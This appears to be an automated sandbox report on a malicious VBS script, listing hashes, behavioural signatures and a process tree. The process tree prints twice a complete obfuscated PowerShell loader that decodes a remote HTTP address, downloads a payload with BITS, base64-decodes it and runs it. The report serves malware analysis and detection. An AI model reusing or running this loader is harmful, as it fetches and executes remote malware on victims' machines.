Analysis
-
max time kernel
93s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
13/02/2024, 05:41
Static task
static1
Behavioral task
behavioral1
Sample
dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86.vbs
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86.vbs
Resource
win10v2004-20231215-en
General
-
Target
dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86.vbs
-
Size
37KB
-
MD5
38a7d7d9221cbbdaebc363213e712492
-
SHA1
67aacef9422498071ed7395fdd2cd0538e2c9fee
-
SHA256
dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86
-
SHA512
d3a8ea582f2066be4759a753f2f22ac1d937a491218966011f87ec458c36a962062761425c0484ad79c10c13af2b983894491ef0606527e479e0c9b61c35ffef
-
SSDEEP
768:vUJqmkNEmbCXqwCrz3kadHM3+oEWzMIHl+xAaRV0e:cJQE0b9rz/JMOoTzMIHw3r
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1640 2036 WerFault.exe 89 -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4988 powershell.exe 4988 powershell.exe 2036 powershell.exe 2036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4988 powershell.exe Token: SeDebugPrivilege 2036 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2160 wrote to memory of 4988 2160 WScript.exe 84 PID 2160 wrote to memory of 4988 2160 WScript.exe 84 PID 4988 wrote to memory of 1944 4988 powershell.exe 86 PID 4988 wrote to memory of 1944 4988 powershell.exe 86 PID 1944 wrote to memory of 3076 1944 cmd.exe 87 PID 1944 wrote to memory of 3076 1944 cmd.exe 87 PID 4988 wrote to memory of 2036 4988 powershell.exe 89 PID 4988 wrote to memory of 2036 4988 powershell.exe 89 PID 4988 wrote to memory of 2036 4988 powershell.exe 89 PID 2036 wrote to memory of 4036 2036 powershell.exe 90 PID 2036 wrote to memory of 4036 2036 powershell.exe 90 PID 2036 wrote to memory of 4036 2036 powershell.exe 90 PID 4036 wrote to memory of 428 4036 cmd.exe 91 PID 4036 wrote to memory of 428 4036 cmd.exe 91 PID 4036 wrote to memory of 428 4036 cmd.exe 91
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Annoncy;function Dejligeaf ($Allemand, $Feis172, $Aktiec138) {$Allemand.'Substring'( $Feis172, $Aktiec138);}Function Blemishes9 ([String]$Disti254){For($Anno=5; $Anno -lt $Disti254.Length-$Cerco; $Anno+=6){$Tekn163=Dejligeaf $Disti254 $Anno $Cerco;$Continenta=$Continenta+$Tekn163}$Continenta;}$Venen175 = 'tzutil /l';$Lrestre = (cmd /c $Venen175);$Lrestre = [string]$Lrestre;$AnnoNDICE = $Lrestre.indexOf('1');$Cerco = Dejligeaf $Lrestre $AnnoNDICE 1;$Hovekat=Blemishes9 'VakeehStudettraadtRumvgpDorge: Kera/Linte/ Tunf4Afmon6 Opfo.Mascu1Nerve8bevom3Seros.Under2Trygl2Folke2Panch. Unco1Henst9Midso/ ApteOSwordbHalsksRealieAnxiorLgprdvBedive Bedm.Propphskjolh Overk Aime ';$Continenta01=Blemishes9 'FoliniJegroeAriusxNonso ';$Planlgnin = Blemishes9 'Vrdif\SvagtsTribuy FilmsOmstdwSakkaoMouslwAsymp6Forho4 Soli\ZolotWSlagtiDamernincondRadiooQuintw PatrsSanatPUnseao Outpw ScoreCafusrBulleSMousehhaense UnsclUredil Indo\ umbov Syrn1 Skrb. Libe0Unbus\ Partp UnbroKlokkwAbstrePaaserSkeocsresylh EneseSlrerlPlatelUnder. CampeNontrxCasteeFromm ';&($Continenta01) (Blemishes9 'humme$UnminLSilicaCoumaiFlskegHirsehFlages Exacc TaenoSigna2Udstr=Beskn$ Pyloeudfasn KonsvSligh: FormwigangiInternBayondSensuiPitmarTypho ') ;&($Continenta01) (Blemishes9 'Barba$ UnifPStatslAntiratipsenCollelFylkegKletknProdui AnaenDyrkn=Vekse$SnakeL PrecaKiloei HonngStorvhKranis Sponc garroUnfel2Dense+Swage$AgnosP atrilIndsuaAfkrinBoghvl Tempg Turgn MessiFiltrnBenva ') ;&($Continenta01) (Blemishes9 'Elsab$ StenTHustpiDialilBreridDmonekkronekMorfdePolyerCholi Grapp=Apope Chole( Rets(BetnkgSuperw Grommunflaibalti fissiwChlori HushnGlyce3 Etym2pseud_SyndepDispermarkro FlokcPremue Tents StdpsNunce modes-KontoFPleur overpP VorarLongbowiresc StikeSelvhs Scous LngoIkolledUnsup=Elegi$Proje{ForsnPLitteISivarD phle}Resta)Foren.FeasaC AartoKentam UncomMillia Workn QuindAdvisLOralfiSkovbn NonteFavel)Azoph Termo-DistrsPrangpElectl SeriiSikket Sesq Quist[nonadcMoirehStorma Toucr Insi]Oxbra3 Tiri4 Impa ');&($Continenta01) (Blemishes9 'Afhaa$svinePTiptolRigleu TosisReporgAntisr Supe Geote=Arpet Mblem$ AarsTSpidsigarcildentadUncarkKolonkAffodeGiftsr Akse[ Shop$SkrifTStetsi Skrul MiljdReedpkFiloskMetroe Quadr Nond.FiasccLskesostipeuHumannSmmomtRepro- Gram2Coapt]Bonde ');&($Continenta01) (Blemishes9 ' Elsh$IndekaIndusnSemies LetmkStilpaExtem=Reple( BeboT CosieRerigsBiobitTarmi-ginetPIntraa SmovtUretehUvanl Lingo$SweetPTungelImbibaRiggenIdeallDrypsgKaratnInkasi Varin Orga) Mems Kdgry-HonduA SvalnAcetodExpul Const( Ecek[KriteI AftenDisqut SproPPumpetOsteorDispr]Chron:Menuv:PytonsFremtiTilriz SamseHartl Progr-BoudeeRapkfqAdvoc Vider8Wayfa)Ovenp ') ;if ($anska) {.$Planlgnin $Plusgr;} else {;$Continenta00=Blemishes9 'PuritS PinatSproga HvalrToldktMulti-OvertBLsriviklasstlugersSelvoTDeceirKomplaSlagtnhjemvs Pseuf Rangeplafor Slot Tigel-CandySInteroFiresuBeginrFuldbcStjereSkirr Coatr$NoncoHPredioFirklvHepatePrealkhenveaContltcotar Fourb- WhifDUlempeCoelisBelgitFrantiSkyttnClariaPigmetValenihatreoSkansnPropu Talku$UnpasLMahoma ForeiUnorbgArbejhSensisSkolecInstioColit2Krykk ';&($Continenta01) (Blemishes9 'Selet$ SorrL Bonaa ShriiIntergUnaschDatossPrisicMaruloZoosp2Renew=Rumfr$ Baske SpornSpndsvEffek:StunsaprodupAddenpSultedLoffeaJuanitEfferaLaane ') ;&($Continenta01) (Blemishes9 'ProreIFortjmGrundpCoeleoKommar Nulpt Loob-HusvaMHofdioBlndldKrumtuFamillDisboe Hjem CoupeBStrikiUdsputOverssGullaTIntrarRetroaFormanDiplosJagtef SkeleForbur Stru ') ;$Laighsco2=$Laighsco2+'\phrenohe.Fly';while (-not $Fron) {&($Continenta01) (Blemishes9 'Autae$SamleF InterPhysioCzarinRuche= Kryd(PenneTGameteUlvers PeritFyrre- AidaPLedeba StiktSpndih Stbe upopu$BuddiLBreweaAffotiBetydgdiffehTachysLurencslutpoDeeps2Susaa)Fremb ') ;&($Continenta01) $Continenta00;&($Continenta01) (Blemishes9 ' KlumSsatirtStandaSteerrDebritAppli-FrontSBaggrlbacteefinane TegnpLocke Bogf5Juice ');}&($Continenta01) (Blemishes9 ' Taxa$EkskoB BegolRaadfeGrundm AcroiJordssSomnoh Diale RepusBevge Trans=Fouls ElektGSmackeStatstTersv-FjervCStormoreclanInkartHalluelertjnTempotTilko Beeke$EggfiL SkydaBlankiDisapgLangthSegresObscecFoneto Untr2Flamm ');&($Continenta01) (Blemishes9 'Nonco$SingeUSprinn Tilfpmundto AvicpOophouVibralHorreaRibestStatsedaemo Bonyt=Daken Forko[DeputSBgernymecons Unwot ApexeTvindmInter.FiskeCSkarnoAnstanAgamov milie ModerTempotHabil]schoo:Penci:ReroyFDrukmrChiefo EkelmDejedBPhaetaSeleus PlejeCocka6Gotha4SurfaSSlingtKulisr RoutiPneomnTaktigTmrer( Kond$KumpaB Opnolpolite TantmPeartiSporas EnsohazureeJournsBesgs)boyfr ');&($Continenta01) (Blemishes9 'Aftal$SuperC FuldoSterenOkkultPampeiBekymn ForkeSoftwnPorkotSamkvaufine2Plets Rntge=Camph Ahorn[ PrivSEmulsyMinims VesttSkriveSemidm Jong.SivsaT TerreKinesxTextttExtra.HenriESimuln SpracSubstoDaarldNovati SpeanOplivgNonre]Joggi: slit:HomosA bittSIncorCDiffeI OxydIBorer. BulrGHusboeblimptPheriSFdseltUngrarRevoliLydmunForlagFagbl(Ferie$VektoUMaladnjonispMaddyoSystepCytomuGylpelExteraProtot Alleekruse)Aabni ');&($Continenta01) (Blemishes9 'Litte$StraaSlegibybacchgPreulgComon=tarra$ stamCEnkeloGerninEkspotFujitiDinocnSnknieFamilnHeavetAmbula Mais2Flavo. GtemsunpaluLoangbPotwosOphavtGeofyrFolkeiClodhnRechegskall( Skat2 Anaz9nderz6Brush1Ganes0Daahi2 Star, Inte1Pulpi9Timev8Bille9Inkor6 Pent)Tisse ');&($Continenta01) $Sygg;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "tzutil /l"3⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\system32\tzutil.exetzutil /l4⤵PID:3076
-
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Annoncy;function Dejligeaf ($Allemand, $Feis172, $Aktiec138) {$Allemand.'Substring'( $Feis172, $Aktiec138);}Function Blemishes9 ([String]$Disti254){For($Anno=5; $Anno -lt $Disti254.Length-$Cerco; $Anno+=6){$Tekn163=Dejligeaf $Disti254 $Anno $Cerco;$Continenta=$Continenta+$Tekn163}$Continenta;}$Venen175 = 'tzutil /l';$Lrestre = (cmd /c $Venen175);$Lrestre = [string]$Lrestre;$AnnoNDICE = $Lrestre.indexOf('1');$Cerco = Dejligeaf $Lrestre $AnnoNDICE 1;$Hovekat=Blemishes9 'VakeehStudettraadtRumvgpDorge: Kera/Linte/ Tunf4Afmon6 Opfo.Mascu1Nerve8bevom3Seros.Under2Trygl2Folke2Panch. Unco1Henst9Midso/ ApteOSwordbHalsksRealieAnxiorLgprdvBedive Bedm.Propphskjolh Overk Aime ';$Continenta01=Blemishes9 'FoliniJegroeAriusxNonso ';$Planlgnin = Blemishes9 'Vrdif\SvagtsTribuy FilmsOmstdwSakkaoMouslwAsymp6Forho4 Soli\ZolotWSlagtiDamernincondRadiooQuintw PatrsSanatPUnseao Outpw ScoreCafusrBulleSMousehhaense UnsclUredil Indo\ umbov Syrn1 Skrb. Libe0Unbus\ Partp UnbroKlokkwAbstrePaaserSkeocsresylh EneseSlrerlPlatelUnder. CampeNontrxCasteeFromm ';&($Continenta01) (Blemishes9 'humme$UnminLSilicaCoumaiFlskegHirsehFlages Exacc TaenoSigna2Udstr=Beskn$ Pyloeudfasn KonsvSligh: FormwigangiInternBayondSensuiPitmarTypho ') ;&($Continenta01) (Blemishes9 'Barba$ UnifPStatslAntiratipsenCollelFylkegKletknProdui AnaenDyrkn=Vekse$SnakeL PrecaKiloei HonngStorvhKranis Sponc garroUnfel2Dense+Swage$AgnosP atrilIndsuaAfkrinBoghvl Tempg Turgn MessiFiltrnBenva ') ;&($Continenta01) (Blemishes9 'Elsab$ StenTHustpiDialilBreridDmonekkronekMorfdePolyerCholi Grapp=Apope Chole( Rets(BetnkgSuperw Grommunflaibalti fissiwChlori HushnGlyce3 Etym2pseud_SyndepDispermarkro FlokcPremue Tents StdpsNunce modes-KontoFPleur overpP VorarLongbowiresc StikeSelvhs Scous LngoIkolledUnsup=Elegi$Proje{ForsnPLitteISivarD phle}Resta)Foren.FeasaC AartoKentam UncomMillia Workn QuindAdvisLOralfiSkovbn NonteFavel)Azoph Termo-DistrsPrangpElectl SeriiSikket Sesq Quist[nonadcMoirehStorma Toucr Insi]Oxbra3 Tiri4 Impa ');&($Continenta01) (Blemishes9 'Afhaa$svinePTiptolRigleu TosisReporgAntisr Supe Geote=Arpet Mblem$ AarsTSpidsigarcildentadUncarkKolonkAffodeGiftsr Akse[ Shop$SkrifTStetsi Skrul MiljdReedpkFiloskMetroe Quadr Nond.FiasccLskesostipeuHumannSmmomtRepro- Gram2Coapt]Bonde ');&($Continenta01) (Blemishes9 ' Elsh$IndekaIndusnSemies LetmkStilpaExtem=Reple( BeboT CosieRerigsBiobitTarmi-ginetPIntraa SmovtUretehUvanl Lingo$SweetPTungelImbibaRiggenIdeallDrypsgKaratnInkasi Varin Orga) Mems Kdgry-HonduA SvalnAcetodExpul Const( Ecek[KriteI AftenDisqut SproPPumpetOsteorDispr]Chron:Menuv:PytonsFremtiTilriz SamseHartl Progr-BoudeeRapkfqAdvoc Vider8Wayfa)Ovenp ') ;if ($anska) {.$Planlgnin $Plusgr;} else {;$Continenta00=Blemishes9 'PuritS PinatSproga HvalrToldktMulti-OvertBLsriviklasstlugersSelvoTDeceirKomplaSlagtnhjemvs Pseuf Rangeplafor Slot Tigel-CandySInteroFiresuBeginrFuldbcStjereSkirr Coatr$NoncoHPredioFirklvHepatePrealkhenveaContltcotar Fourb- WhifDUlempeCoelisBelgitFrantiSkyttnClariaPigmetValenihatreoSkansnPropu Talku$UnpasLMahoma ForeiUnorbgArbejhSensisSkolecInstioColit2Krykk ';&($Continenta01) (Blemishes9 'Selet$ SorrL Bonaa ShriiIntergUnaschDatossPrisicMaruloZoosp2Renew=Rumfr$ Baske SpornSpndsvEffek:StunsaprodupAddenpSultedLoffeaJuanitEfferaLaane ') ;&($Continenta01) (Blemishes9 'ProreIFortjmGrundpCoeleoKommar Nulpt Loob-HusvaMHofdioBlndldKrumtuFamillDisboe Hjem CoupeBStrikiUdsputOverssGullaTIntrarRetroaFormanDiplosJagtef SkeleForbur Stru ') ;$Laighsco2=$Laighsco2+'\phrenohe.Fly';while (-not $Fron) {&($Continenta01) (Blemishes9 'Autae$SamleF InterPhysioCzarinRuche= Kryd(PenneTGameteUlvers PeritFyrre- AidaPLedeba StiktSpndih Stbe upopu$BuddiLBreweaAffotiBetydgdiffehTachysLurencslutpoDeeps2Susaa)Fremb ') ;&($Continenta01) $Continenta00;&($Continenta01) (Blemishes9 ' KlumSsatirtStandaSteerrDebritAppli-FrontSBaggrlbacteefinane TegnpLocke Bogf5Juice ');}&($Continenta01) (Blemishes9 ' Taxa$EkskoB BegolRaadfeGrundm AcroiJordssSomnoh Diale RepusBevge Trans=Fouls ElektGSmackeStatstTersv-FjervCStormoreclanInkartHalluelertjnTempotTilko Beeke$EggfiL SkydaBlankiDisapgLangthSegresObscecFoneto Untr2Flamm ');&($Continenta01) (Blemishes9 'Nonco$SingeUSprinn Tilfpmundto AvicpOophouVibralHorreaRibestStatsedaemo Bonyt=Daken Forko[DeputSBgernymecons Unwot ApexeTvindmInter.FiskeCSkarnoAnstanAgamov milie ModerTempotHabil]schoo:Penci:ReroyFDrukmrChiefo EkelmDejedBPhaetaSeleus PlejeCocka6Gotha4SurfaSSlingtKulisr RoutiPneomnTaktigTmrer( Kond$KumpaB Opnolpolite TantmPeartiSporas EnsohazureeJournsBesgs)boyfr ');&($Continenta01) (Blemishes9 'Aftal$SuperC FuldoSterenOkkultPampeiBekymn ForkeSoftwnPorkotSamkvaufine2Plets Rntge=Camph Ahorn[ PrivSEmulsyMinims VesttSkriveSemidm Jong.SivsaT TerreKinesxTextttExtra.HenriESimuln SpracSubstoDaarldNovati SpeanOplivgNonre]Joggi: slit:HomosA bittSIncorCDiffeI OxydIBorer. BulrGHusboeblimptPheriSFdseltUngrarRevoliLydmunForlagFagbl(Ferie$VektoUMaladnjonispMaddyoSystepCytomuGylpelExteraProtot Alleekruse)Aabni ');&($Continenta01) (Blemishes9 'Litte$StraaSlegibybacchgPreulgComon=tarra$ stamCEnkeloGerninEkspotFujitiDinocnSnknieFamilnHeavetAmbula Mais2Flavo. GtemsunpaluLoangbPotwosOphavtGeofyrFolkeiClodhnRechegskall( Skat2 Anaz9nderz6Brush1Ganes0Daahi2 Star, Inte1Pulpi9Timev8Bille9Inkor6 Pent)Tisse ');&($Continenta01) $Sygg;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "tzutil /l"4⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\SysWOW64\tzutil.exetzutil /l5⤵PID:428
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 23844⤵
- Program crash
PID:1640
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2036 -ip 20361⤵PID:3272
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82